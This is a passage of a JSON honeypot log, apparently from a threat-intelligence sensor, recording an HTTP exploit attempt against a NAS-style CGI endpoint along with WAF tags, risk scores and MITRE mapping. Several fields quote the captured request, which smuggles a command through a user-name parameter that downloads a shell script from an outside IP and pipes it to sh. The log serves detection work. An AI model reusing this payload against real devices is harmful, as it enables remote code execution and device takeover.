\u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":308}],"total_events":181}